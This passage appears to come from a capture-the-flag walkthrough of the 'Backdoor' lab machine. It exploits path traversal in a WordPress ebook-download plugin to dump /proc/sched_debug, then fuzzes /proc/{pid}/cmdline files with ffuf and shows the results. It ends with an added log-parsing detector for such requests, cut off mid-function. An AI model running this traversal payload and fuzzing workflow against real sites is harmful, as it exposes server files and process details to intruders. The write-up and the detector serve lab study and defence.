 Iacpi_thermal_pm   126       861.158414         2   100         0.000000         0.003830         0.000000 0 0 /
 Ivfio-irqfd-clea   132       873.201845         2   100         0.000000         0.005030         0.000000 0 0 /
 I  ipv6_addrconf   134       896.342308         2   100         0.000000         0.013510         0.000000 0 0 /
 I kworker/u257:0   146       946.497381         2   100         0.000000         0.013970         0.000000 0 0 /
 I          mpt/0   199      1208.826430         2   100         0.000000         0.008660         0.000000 0 0 /
 S      scsi_eh_2   200      2905.962107        26   120         0.000000         1.031890         0.000000 0 0 /
 S      scsi_eh_3   202      2905.915477        26   120         0.000000         0.939060         0.000000 0 0 /
 S      scsi_eh_4   204      2905.522677        26   120         0.000000         0.502340         0.000000 0 0 /
 I     scsi_tmf_4   205      2675.852160         2   100         0.000000         0.008050         0.000000 0 0 /
 S  irq/16-vmwgfx   207        -1.220909     16491    49         0.000000       306.173480         0.000000 0 0 /
 S      scsi_eh_6   209      2905.911647        26   120         0.000000         0.882070         0.000000 0 0 /
 S      scsi_eh_9   215      2906.006077        26   120         0.000000         0.969400         0.000000 0 0 /
 S     scsi_eh_12   221      2905.989167        26   120         0.000000         0.966980         0.000000 0 0 /
 S     scsi_eh_13   223      2905.952757        26   120         0.000000         0.966650         0.000000 0 0 /
 S     scsi_eh_14   225      2905.543747        26   120         0.000000         0.584700         0.000000 0 0 /
 S     scsi_eh_16   229      2905.983067        26   120         0.000000         0.935600         0.000000 0 0 /
 S     scsi_eh_17   231      2905.484637        26   120         0.000000         0.453000         0.000000 0 0 /
 S     scsi_eh_18   233      2905.968287        26   120         0.000000         0.947200         0.000000 0 0 /
 S     scsi_eh_20   237      2905.912647        26   120         0.000000         0.876900         0.000000 0 0 /
 I    scsi_tmf_22   244      2694.586770         2   100         0.000000         0.009500         0.000000 0 0 /
 I    scsi_tmf_24   263      2726.773872         2   100         0.000000         0.008310         0.000000 0 0 /
 S     scsi_eh_25   266      2905.522407        27   120         0.000000         0.506610         0.000000 0 0 /
 S     scsi_eh_26   270      2905.933967        26   120         0.000000         0.923450         0.000000 0 0 /
 I    scsi_tmf_26   272      2768.968135         2   100         0.000000         0.010760         0.000000 0 0 /
 I    scsi_tmf_27   276      2794.205470         2   100         0.000000         0.008530         0.000000 0 0 /
 S     scsi_eh_29   288      2905.910277        26   120         0.000000         0.895920         0.000000 0 0 /
 I    scsi_tmf_29   289      2854.639701         2   100         0.000000         0.008110         0.000000 0 0 /
 S     scsi_eh_30   292      2906.062467        26   120         0.000000         1.050620         0.000000 0 0 /
 S     scsi_eh_31   294      2905.815461        26   120         0.000000         0.566150         0.000000 0 0 /
 I    scsi_tmf_31   295      2865.658711         2   100         0.000000         0.007290         0.000000 0 0 /
 I    scsi_tmf_32   326      2917.033447         2   100         0.000000         0.007910         0.000000 0 0 /
 I   kworker/0:1H   327     15666.827258      2926   100         0.000000        47.482700         0.000000 0 0 /
 I       kdmflush   340      2968.544087         2   100         0.000000         0.014870         0.000000 0 0 /
 I        raid5wq   373      3079.091931         2   100         0.000000         0.013370         0.000000 0 0 /
 Iext4-rsv-conver   428      3291.327622         2   100         0.000000         0.014530         0.000000 0 0 /
 I         kaluad   651      7130.355762         2   100         0.000000         0.006260         0.000000 0 0 /
 S     multipathd   655         0.000000      4691     0         0.000000        94.699960         0.000000 0 0 /autogroup-24
 S     multipathd   657         0.000000         1     0         0.000000         0.259910         0.000000 0 0 /autogroup-24
 S     multipathd   658         0.000000       133     0         0.000000         4.411800         0.000000 0 0 /autogroup-24
 Ssystemd-timesyn   679       120.995384       483   120         0.000000       132.502110         0.000000 0 0 /autogroup-31
 S   HangDetector   752      1046.948344      4021   120         0.000000        92.978310         0.000000 0 0 /autogroup-36
 Saccounts-daemon   749       549.031179        67   120         0.000000        10.378790         0.000000 0 0 /autogroup-38
 S          gmain   754       561.877519      3831   120         0.000000       165.605480         0.000000 0 0 /autogroup-38
 S          gdbus   889       549.516819        33   120         0.000000         2.167690         0.000000 0 0 /autogroup-38
 S       rsyslogd   771        56.351033        33   120         0.000000         4.958700         0.000000 0 0 /autogroup-44
 S  rs:main Q:Reg   843        65.896163      2230   120         0.000000        79.671530         0.000000 0 0 /autogroup-44
 S             sh   816     24293.837963      7913   120         0.000000      1218.288540         0.000000 0 0 /autogroup-56
 S           sshd   833         0.418626         8   120         0.000000         7.942470         0.000000 0 0 /autogroup-64
 S         screen   906         0.602336        10   120         0.000000         1.120710         0.000000 0 0 /autogroup-75
 S           bash   908        17.903144        52   120         0.000000        18.897880         0.000000 0 0 /autogroup-76
 S         agetty   913        -3.840396        10   120         0.000000         3.330180         0.000000 0 0 /autogroup-84
 S        systemd   917        54.346534       179   120         0.000000        69.018000         0.000000 0 0 /autogroup-77
 S       (sd-pam)   925         3.705450         2   120         0.000000         0.136500         0.000000 0 0 /autogroup-77
 S     ib_io_ibuf   993       771.482680      7745   120         0.000000        69.874120         0.000000 0 0 /autogroup-82
 S      ib_io_log   994       771.476000      7745   120         0.000000        77.792220         0.000000 0 0 /autogroup-82
 S     ib_io_rd-1   995       771.482380      7748   120         0.000000       100.392780         0.000000 0 0 /autogroup-82
 S     ib_io_rd-2   996       771.471220      7745   120         0.000000        81.592840         0.000000 0 0 /autogroup-82
 S     ib_io_rd-3   997       771.483690      7748   120         0.000000       107.643540         0.000000 0 0 /autogroup-82
 S     ib_io_rd-4   998       771.469530      7745   120         0.000000        81.978890         0.000000 0 0 /autogroup-82
 S     ib_io_wr-3  1001       775.934870      7848   120         0.000000       155.501680         0.000000 0 0 /autogroup-82
 S     ib_io_wr-4  1002       775.954690      7824   120         0.000000       142.807080         0.000000 0 0 /autogroup-82
 S ib_log_checkpt  1004       775.574210      3904   120         0.000000       118.354170         0.000000 0 0 /autogroup-82
 S     ib_srv_mon  1031       769.863310       775   120         0.000000        19.776670         0.000000 0 0 /autogroup-82
 S  ib_buf_resize  1032       153.389776         1   120         0.000000         0.028070         0.000000 0 0 /autogroup-82
 S   ib_srv_purge  1046       417.819490      1813   120         0.000000        30.218040         0.000000 0 0 /autogroup-82
 S   ib_srv_wkr-1  1047       417.464950       884   120         0.000000        28.941090         0.000000 0 0 /autogroup-82
 S   ib_srv_wkr-2  1048       415.492600       775   120         0.000000        25.314770         0.000000 0 0 /autogroup-82
 S        apache2  3160       709.965553       166   120         0.000000        38.611170         0.000000 0 0 /autogroup-78
 S        apache2  4996       691.601983        34   120         0.000000        11.022220         0.000000 0 0 /autogroup-78
 S        apache2  5005       694.699653        34   120         0.000000        10.280060         0.000000 0 0 /autogroup-78
 S        apache2  5020       757.435313        38   120         0.000000        10.067530         0.000000 0 0 /autogroup-78
 I    kworker/0:1  9067     15693.681043      6514   120         0.000000       178.078230         0.000000 0 0 /
 I    kworker/0:2  9921     15262.821923         2   120         0.000000         0.013520         0.000000 0 0 /
 S             su  9951        10.231050        22   120         0.000000         5.851000         0.000000 0 0 /autogroup-63
 S           bash  9959         0.058816         2   120         0.000000         1.272740         0.000000 0 0 /autogroup-97
 S      gdbserver  9960         5.262882        12   120         0.000000         1.577490         0.000000 0 0 /autogroup-97

cpu#1, 2000.000 MHz
  .nr_running                    : 1
  .nr_switches                   : 542769
  .nr_load_updates               : 0
  .nr_uninterruptible            : -2
  .next_balance                  : 4295.864258
  .curr->pid                     : 5001
  .clock                         : 3888056.353640
  .clock_task                    : 3888056.353640
  .avg_idle                      : 1000000
  .max_idle_balance_cost         : 500000

cfs_rq[1]:/autogroup-82
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 2106.837584
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -13592.677659
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 4
  .runnable_load_avg             : 0
  .util_avg                      : 1
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 4
  .tg_load_avg                   : 4
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 3888048.089570
  .se->vruntime                  : 20252.850533
  .se->sum_exec_runtime          : 4045.453630
  .se->load.weight               : 1048576
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 2
  .se->avg.util_avg              : 1
  .se->avg.runnable_load_avg     : 0

cfs_rq[1]:/autogroup-36
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 2916.185737
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -12783.329506
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 3888035.356290
  .se->vruntime                  : 20251.725401
  .se->sum_exec_runtime          : 2903.749010
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[1]:/autogroup-78
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 498.994326
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -15200.520917
  .nr_spread_over                : 0
  .nr_running                    : 1
  .load                          : 1048576
  .runnable_weight               : 1048576
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 3888056.353640
  .se->vruntime                  : 20251.242381
  .se->sum_exec_runtime          : 1039.882000
  .se->load.weight               : 1048576
  .se->runnable_weight           : 1048576
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[1]:/
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 20257.185281
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : 4557.670038
  .nr_spread_over                : 0
  .nr_running                    : 1
  .load                          : 1048576
  .runnable_weight               : 1048576
  .load_avg                      : 4
  .runnable_load_avg             : 0
  .util_avg                      : 5
  .util_est_enqueued             : 11
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0

rt_rq[1]:
  .rt_nr_running                 : 0
  .rt_nr_migratory               : 0
  .rt_throttled                  : 0
  .rt_time                       : 0.000000
  .rt_runtime                    : 950.000000

dl_rq[1]:
  .dl_nr_running                 : 0
  .dl_nr_migratory               : 0
  .dl_bw->bw                     : 996147
  .dl_bw->total_bw               : 0

runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1       515.963755      3001   120         0.000000      1436.402490         0.000000 0 0 /autogroup-2
 S       kthreadd     2     19854.750146       289   120         0.000000         3.772400         0.000000 0 0 /
 S        cpuhp/1    15      9619.140921         9   120         0.000000         0.131560         0.000000 0 0 /
 S  idle_inject/1    16        -3.000000         3    49         0.000000         0.001350         0.000000 0 0 /
 S    migration/1    17         0.000000      1091     0         0.000000       148.375764         0.000000 0 0 /
 S    ksoftirqd/1    18     20251.198161      1038   120         0.000000        37.858230         0.000000 0 0 /
 I   kworker/1:0H    20      4553.468099         5   100         0.000000         0.017200         0.000000 0 0 /
 S      kdevtmpfs    21      9720.593273       188   120         0.000000         1.921670         0.000000 0 0 /
 I          netns    22         2.951423         2   100         0.000000         0.000000         0.000000 0 0 /
 Srcu_tasks_kthre    23         2.951423         2   120         0.000000         0.000000         0.000000 0 0 /
 S        kauditd    24      9690.553996         9   120         0.000000         0.118720         0.000000 0 0 /
 S     khungtaskd    27     20234.026555        34   120         0.000000         6.054490         0.000000 0 0 /
 S     oom_reaper    28        26.964921         2   120         0.000000         0.000000         0.000000 0 0 /
 I      writeback    29        32.966058         2   100         0.000000         0.002100         0.000000 0 0 /
 S     kcompactd0    30        38.968365         2   120         0.000000         0.002310         0.000000 0 0 /
 S           ksmd    31        44.968362         2   125         0.000000         0.000000         0.000000 0 0 /
 S     khugepaged    32        50.968359         2   139         0.000000         0.000000         0.000000 0 0 /
 I    kintegrityd    78       326.968551         2   100         0.000000         0.000000         0.000000 0 0 /
 I        kblockd    79       332.968548         2   100         0.000000         0.000000         0.000000 0 0 /
 I     tpm_dev_wq    82       358.716306         2   100         0.000000         0.031320         0.000000 0 0 /
 I        ata_sff    83       362.724055         2   100         0.000000         0.007750         0.000000 0 0 /
 I             md    84       366.732684         2   100         0.000000         0.008630         0.000000 0 0 /
 I    edac-poller    85       370.739303         2   100         0.000000         0.006620         0.000000 0 0 /
 I     devfreq_wq    86       374.739302         2   100         0.000000         0.000000         0.000000 0 0 /
 S        kswapd0    90       401.046925         3   120         0.000000         0.070100         0.000000 0 0 /
 I       kthrotld    93       390.954901         2   100         0.000000         0.013470         0.000000 0 0 /
 S  irq/25-pciehp    95         0.000000         3    49         0.000000         0.031150         0.000000 0 0 /
 S  irq/27-pciehp    97         0.000000         3    49         0.000000         0.021510         0.000000 0 0 /
 S  irq/29-pciehp    99         0.000000         3    49         0.000000         0.028840         0.000000 0 0 /
 S  irq/31-pciehp   101         0.000000         3    49         0.000000         0.031140         0.000000 0 0 /
 S  irq/33-pciehp   103         0.000000         3    49         0.000000         0.031390         0.000000 0 0 /
 S  irq/35-pciehp   105         0.000000         3    49         0.000000         0.013310         0.000000 0 0 /
 S  irq/37-pciehp   107         0.000000         3    49         0.000000         0.031890         0.000000 0 0 /
 S  irq/39-pciehp   109         0.000000         3    49         0.000000         0.008530         0.000000 0 0 /
 S  irq/41-pciehp   111         0.000000         3    49         0.000000         0.050030         0.000000 0 0 /
 S  irq/43-pciehp   113         0.000000         3    49         0.000000         0.051050         0.000000 0 0 /
 S  irq/45-pciehp   115         0.000000         3    49         0.000000         0.050270         0.000000 0 0 /
 S  irq/47-pciehp   117         0.000000         3    49         0.000000         0.072440         0.000000 0 0 /
 S  irq/49-pciehp   119         0.000000         3    49         0.000000         0.051010         0.000000 0 0 /
 S  irq/51-pciehp   121         0.000000         3    49         0.000000         0.032410         0.000000 0 0 /
 S  irq/53-pciehp   123         0.000000         3    49         0.000000         0.022460         0.000000 0 0 /
 S  irq/55-pciehp   125         0.000000         3    49         0.000000         0.031860         0.000000 0 0 /
 S      scsi_eh_0   127       472.147675         4   120         0.000000        10.972120         0.000000 0 0 /
 I     scsi_tmf_0   128       398.998831         2   100         0.000000         0.022290         0.000000 0 0 /
 S      scsi_eh_1   129       472.809105         4   120         0.000000        11.499780         0.000000 0 0 /
 I     scsi_tmf_1   130       407.036405         2   100         0.000000         0.019230         0.000000 0 0 /
 I          kstrp   143       432.652467         2   100         0.000000         0.005730         0.000000 0 0 /
 Icharger_manager   159       467.633525         2   100         0.000000         0.007620         0.000000 0 0 /
 I     mpt_poll_0   198       914.433987         2   100         0.000000         0.099680         0.000000 0 0 /
 I     scsi_tmf_2   201      3114.035121         2   100         0.000000         0.005700         0.000000 0 0 /
 I     scsi_tmf_3   203      3128.384402         2   100         0.000000         0.005400         0.000000 0 0 /
 S      scsi_eh_5   206      3467.476374        26   120         0.000000         1.451290         0.000000 0 0 /
 I     scsi_tmf_5   208      3158.649153         2   100         0.000000         0.002970         0.000000 0 0 /
 I     scsi_tmf_6   210      3166.650961         2   100         0.000000         0.002810         0.000000 0 0 /
 S      scsi_eh_7   211      3466.911274        26   120         0.000000         0.836640         0.000000 0 0 /
 I     scsi_tmf_7   212      3174.652726         2   100         0.000000         0.002290         0.000000 0 0 /
 S      scsi_eh_8   213      3466.962144        26   120         0.000000         0.886470         0.000000 0 0 /
 I     scsi_tmf_8   214      3182.654224         2   100         0.000000         0.002140         0.000000 0 0 /
 I     scsi_tmf_9   216      3190.655821         2   100         0.000000         0.002140         0.000000 0 0 /
 S     scsi_eh_10   217      3467.074194        26   120         0.000000         1.008860         0.000000 0 0 /
 I    scsi_tmf_10   218      3198.657329         2   100         0.000000         0.002110         0.000000 0 0 /
 S     scsi_eh_11   219      3466.967024        26   120         0.000000         0.901040         0.000000 0 0 /
 I    scsi_tmf_11   220      3206.658897         2   100         0.000000         0.002130         0.000000 0 0 /
 I    scsi_tmf_12   222      3214.660445         2   100         0.000000         0.002120         0.000000 0 0 /
 I    scsi_tmf_13   224      3222.661942         2   100         0.000000         0.002040         0.000000 0 0 /
 I    scsi_tmf_14   226      3230.663401         2   100         0.000000         0.002050         0.000000 0 0 /
 S     scsi_eh_15   227      3467.015954        26   120         0.000000         0.996090         0.000000 0 0 /
 I    scsi_tmf_15   228      3238.664819         2   100         0.000000         0.001960         0.000000 0 0 /
 I    scsi_tmf_16   230      3246.666336         2   100         0.000000         0.002000         0.000000 0 0 /
 I    scsi_tmf_17   232      3254.667794         2   100         0.000000         0.002000         0.000000 0 0 /
 I    scsi_tmf_18   234      3262.669353         2   100         0.000000         0.002160         0.000000 0 0 /
 S     scsi_eh_19   235      3466.967814        26   120         0.000000         0.936320         0.000000 0 0 /
 I    scsi_tmf_19   236      3270.670931         2   100         0.000000         0.002170         0.000000 0 0 /
 I    scsi_tmf_20   238      3278.672519         2   100         0.000000         0.002240         0.000000 0 0 /
 S     scsi_eh_21   239      3467.008954        26   120         0.000000         0.930060         0.000000 0 0 /
 I    scsi_tmf_21   240      3286.674600         2   100         0.000000         0.002950         0.000000 0 0 /
 S     scsi_eh_22   241      3466.984654        26   120         0.000000         0.982770         0.000000 0 0 /
 I       ttm_swap   242      3290.676642         2   100         0.000000         0.005410         0.000000 0 0 /
 I         cryptd   243      3294.171350         2   100         0.000000         0.008490         0.000000 0 0 /
 S     scsi_eh_23   250      3467.389594        26   120         0.000000         1.343560         0.000000 0 0 /
 I    scsi_tmf_23   254      3307.976469         2   100         0.000000         0.009540         0.000000 0 0 /
 S     scsi_eh_24   257      3466.983274        26   120         0.000000         0.940400         0.000000 0 0 /
 I    scsi_tmf_25   268      3325.170472         2   100         0.000000         0.007550         0.000000 0 0 /
 S     scsi_eh_27   274      3466.932984        26   120         0.000000         0.870440         0.000000 0 0 /
 S     scsi_eh_28   278      3466.988974        26   120         0.000000         0.954740         0.000000 0 0 /
 I    scsi_tmf_28   286      3360.887236         2   100         0.000000         0.009770         0.000000 0 0 /
 I    scsi_tmf_30   293      3368.480111         2   100         0.000000         0.003280         0.000000 0 0 /
 S     scsi_eh_32   325      3478.167941         2   120         0.000000         0.006600         0.000000 0 0 /
 I   kworker/1:1H   334     20251.185475      4398   100         0.000000       666.837070         0.000000 0 0 /
 I       kdmflush   342      4590.426086         2   100         0.000000         0.010790         0.000000 0 0 /
 S    jbd2/dm-0-8   427     20251.354481      3868   120         0.000000       683.110790         0.000000 0 0 /
 Ssystemd-journal   485       364.094600      3805   119         0.000000      1035.144760         0.000000 0 0 /autogroup-3
 S  systemd-udevd   512      1579.887951      2094   120         0.000000       650.154970         0.000000 0 0 /autogroup-15
 Ssystemd-network   528        22.064344       326   120         0.000000        64.087450         0.000000 0 0 /autogroup-17
 I   kmpath_rdacd   652      9654.587837         2   100         0.000000         0.009190         0.000000 0 0 /
 I        kmpathd   653      9658.599931         2   100         0.000000         0.013460         0.000000 0 0 /
 Ikmpath_handlerd   654      9662.609687         2   100         0.000000         0.010420         0.000000 0 0 /
 S     multipathd   656         0.000000       779     0         0.000000        24.616000         0.000000 0 0 /autogroup-24
 S     multipathd   659         0.000000      6115     0         0.000000      1344.361900         0.000000 0 0 /autogroup-24
 S     multipathd   660         0.000000         4     0         0.000000         3.713240         0.000000 0 0 /autogroup-24
 S     multipathd   661         0.000000         5     0         0.000000         0.215580         0.000000 0 0 /autogroup-24
 S    jbd2/sda2-8   663     16959.254078        17   120         0.000000         0.342370         0.000000 0 0 /
 Iext4-rsv-conver   664      9671.055457         2   100         0.000000         0.012670         0.000000 0 0 /
 Ssystemd-resolve   678       225.642944       970   120         0.000000       392.510760         0.000000 0 0 /autogroup-30
 S     sd-resolve   748       123.287787      1557   120         0.000000       167.656340         0.000000 0 0 /autogroup-31
 S  VGAuthService   688        11.177426        89   120         0.000000        12.465580         0.000000 0 0 /autogroup-35
 S       vmtoolsd   696      2916.185737     45131   120         0.000000      2840.781290         0.000000 0 0 /autogroup-36
 S       vmtoolsd   753      1197.191827       145   120         0.000000         1.027820         0.000000 0 0 /autogroup-36
 S          gmain   761      1197.192497       148   120         0.000000         1.354780         0.000000 0 0 /autogroup-36
 S    dbus-daemon   750        10.901464       395   120         0.000000        39.923820         0.000000 0 0 /autogroup-37
 S     irqbalance   763       171.113584       400   120         0.000000       736.259240         0.000000 0 0 /autogroup-41
 S          gmain   840         5.941204         1   120         0.000000         0.051770         0.000000 0 0 /autogroup-41
 Snetworkd-dispat   770        24.195854       365   120         0.000000        86.311880         0.000000 0 0 /autogroup-42
 S    in:imuxsock   841        63.580682      1934   120         0.000000        82.897890         0.000000 0 0 /autogroup-44
 S      in:imklog   842         3.139038         5   120         0.000000         2.576600         0.000000 0 0 /autogroup-44
 S systemd-logind   772        51.358314       351   120         0.000000        57.054520         0.000000 0 0 /autogroup-43
 S           cron   795        23.236217        84   120         0.000000         8.922890         0.000000 0 0 /autogroup-53
 S           cron   797         4.951889        22   120         0.000000         2.347230         0.000000 0 0 /autogroup-53
 S           cron   798         4.063958        28   120         0.000000         1.866590         0.000000 0 0 /autogroup-53
 S             sh   822         6.096762         3   120         0.000000         0.875700         0.000000 0 0 /autogroup-63
 S            atd   831         0.698262         5   120         0.000000         1.947490         0.000000 0 0 /autogroup-65
 S        apache2   919       498.994326      3952   120         0.000000       199.204200         0.000000 0 0 /autogroup-78
 S        polkitd   952         0.967613        45   120         0.000000         6.252250         0.000000 0 0 /autogroup-79
 S          gmain   957         0.219552         2   120         0.000000         0.054380         0.000000 0 0 /autogroup-79
 S          gdbus   959         2.391570        30   120         0.000000         2.256970         0.000000 0 0 /autogroup-79
 S         mysqld   982      1454.947024       201   120         0.000000       950.670570         0.000000 0 0 /autogroup-82
 S     ib_io_wr-1   999      2100.835614      7802   120         0.000000       141.530410         0.000000 0 0 /autogroup-82
 S     ib_io_wr-2  1000      2100.819574      7817   120         0.000000        98.355950         0.000000 0 0 /autogroup-82
 S ib_pg_flush_co  1003      2100.851074      4025   120         0.000000       142.333740         0.000000 0 0 /autogroup-82
 Sib_log_fl_notif  1005      2106.837584     39322   120         0.000000       730.203500         0.000000 0 0 /autogroup-82
 S   ib_log_flush  1006      2100.856484     39442   120         0.000000       511.413710         0.000000 0 0 /autogroup-82
 Sib_log_wr_notif  1007      2100.843974     39318   120         0.000000       684.086800         0.000000 0 0 /autogroup-82
 S  ib_log_writer  1008      2100.847394     39350   120         0.000000       516.739660         0.000000 0 0 /autogroup-82
 S ib_srv_lock_to  1029      2100.811394      3874   120         0.000000        82.384720         0.000000 0 0 /autogroup-82
 S ib_srv_err_mon  1030      2100.798264      3873   120         0.000000        77.534820         0.000000 0 0 /autogroup-82
 S    ib_src_main  1033      2100.626584      3874   120         0.000000       259.413790         0.000000 0 0 /autogroup-82
 S  ib_dict_stats  1034      2100.175464       388   120         0.000000        10.692290         0.000000 0 0 /autogroup-82
 S     ib_fts_opt  1035      2100.178374       776   120         0.000000        22.133930         0.000000 0 0 /autogroup-82
 S   xpl_worker-1  1038      2093.646894        65   120         0.000000         1.523890         0.000000 0 0 /autogroup-82
 S   xpl_worker-2  1039      2093.665384        65   120         0.000000         0.924880         0.000000 0 0 /autogroup-82
 S   xpl_accept-1  1040      1256.510815         3   120         0.000000         0.024590         0.000000 0 0 /autogroup-82
 S    ib_buf_dump  1044      1224.615357         4   120         0.000000         0.996910         0.000000 0 0 /autogroup-82
 S  ib_clone_gtid  1045      2100.849224     38720   120         0.000000       680.801160         0.000000 0 0 /autogroup-82
 S   ib_srv_wkr-3  1049      1473.419354       381   120         0.000000        16.402710         0.000000 0 0 /autogroup-82
 S      evt_sched  1050      1258.486107         1   120         0.000000         0.555790         0.000000 0 0 /autogroup-82
 S    sig_handler  1051      1272.678439         4   120         0.000000         0.045260         0.000000 0 0 /autogroup-82
 S   xpl_accept-2  1052      2100.673274      4341   120         0.000000       135.306180         0.000000 0 0 /autogroup-82
 S       gtid_zip  1054      1272.680619         2   120         0.000000         0.173790         0.000000 0 0 /autogroup-82
 S     connection  2745      1456.449824       263   120         0.000000        77.094580         0.000000 0 0 /autogroup-82
 S     connection  2746      1466.696594       424   120         0.000000        67.397070         0.000000 0 0 /autogroup-82
 I kworker/u256:1  3732     20245.186725      8034   120         0.000000       172.354130         0.000000 0 0 /
 I    kworker/1:0  4547     19860.864803     12140   120         0.000000       724.512030         0.000000 0 0 /
 S        apache2  4991       487.566296        35   120         0.000000        14.617150         0.000000 0 0 /autogroup-78
>R        apache2  5001       492.994326        27   120         0.000000        10.675610         0.000000 0 0 /autogroup-78
 S        apache2  5002       487.564526        29   120         0.000000        11.517980         0.000000 0 0 /autogroup-78
 S        apache2  5006       493.332166        28   120         0.000000         8.924860         0.000000 0 0 /autogroup-78
 S        apache2  5015       487.958556        25   120         0.000000        10.375860         0.000000 0 0 /autogroup-78
 S        apache2  5027       487.279166        25   120         0.000000         7.637470         0.000000 0 0 /autogroup-78
 I    kworker/1:2  9006     20252.373780      6044   120         0.000000       396.762240         0.000000 0 0 /
 I kworker/u256:0  9394     20251.282761      1351   120         0.000000        25.784370         0.000000 0 0 /
 t           true  9964        11.181754         5   120         0.000000         0.892650         0.000000 0 0 /autogroup-97
 I    kworker/1:1  9970     19866.729543         2   120         0.000000         0.002290         0.000000 0 0 /
 S          sleep 10722     30630.204671         1   120         0.000000         0.702920         0.000000 0 0 /autogroup-56

<script>window.close()</script>%
 π ~/htb/backdoor ❯

We build a wordlist of /proc/{pid}/cmdline paths so we can enumerate which processes' command lines are readable through the plugin and look for anything interesting.

python -c "for i in range(0,10001): print('/proc/'+str(i)+'/cmdline')" > proc_list.txt

After running ffuf we get a list of readable cmdline files.

 π ~/htb/backdoor ❯ ffuf -c -w proc_list.txt -u "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../../FUZZ" -fw 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../../FUZZ
 :: Wordlist         : FUZZ: proc_list.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 1
________________________________________________

/proc/816/cmdline       [Status: 200, Size: 273, Words: 12, Lines: 1]
/proc/822/cmdline       [Status: 200, Size: 271, Words: 11, Lines: 1]
/proc/833/cmdline       [Status: 200, Size: 228, Words: 8, Lines: 1]
/proc/913/cmdline       [Status: 200, Size: 218, Words: 3, Lines: 1]
/proc/9951/cmdline      [Status: 200, Size: 241, Words: 5, Lines: 1]
/proc/9959/cmdline      [Status: 200, Size: 238, Words: 5, Lines: 1]
:: Progress: [10001/10001] :: Job [1/1] :: 359 req/sec :: Duration: [0:01:01] :: Errors: 0 ::
 π ~/htb/backdoor ❯
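The fuzzing run above leaves a very recognisable trail in the web server's access log: thousands of requests to the plugin's filedownload.php with a traversal sequence in ebookdownloadurl. As an added example (not code from the writeup), the detector below parses Apache combined-format lines, decodes the parameter (single and double URL encoding), flags values that leave the plugin's directory, and counts hits per source address so a burst from one client stands out. The log lines are constructed sample data modelled on the requests shown above; the user-agent strings are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache "combined" log line pattern (enough of it to extract the request target).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# The vulnerable endpoint and parameter as used in the fuzzing run above.
PLUGIN_PATH = "/wp-content/plugins/ebook-download/filedownload.php"
PARAM = "ebookdownloadurl"


def is_traversal(value: str) -> bool:
    """True if the decoded parameter value tries to leave the intended directory."""
    decoded = unquote(unquote(value))  # handle single and double URL encoding
    return "../" in decoded or "..\\" in decoded or decoded.startswith("/")


def parse_line(line: str):
    """Parse one access-log line into a dict with path and query; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def find_traversal_hits(lines):
    """Return (ip, status, requested file) for each suspicious ebook-download request."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] != PLUGIN_PATH:
            continue
        for value in rec["query"].get(PARAM, []):
            if is_traversal(value):
                hits.append((rec["ip"], int(rec["status"]), unquote(value)))
    return hits


def summarize(hits):
    """Count hits per source IP; a fuzzing run shows up as one IP with many hits."""
    counts = {}
    for ip, _, _ in hits:
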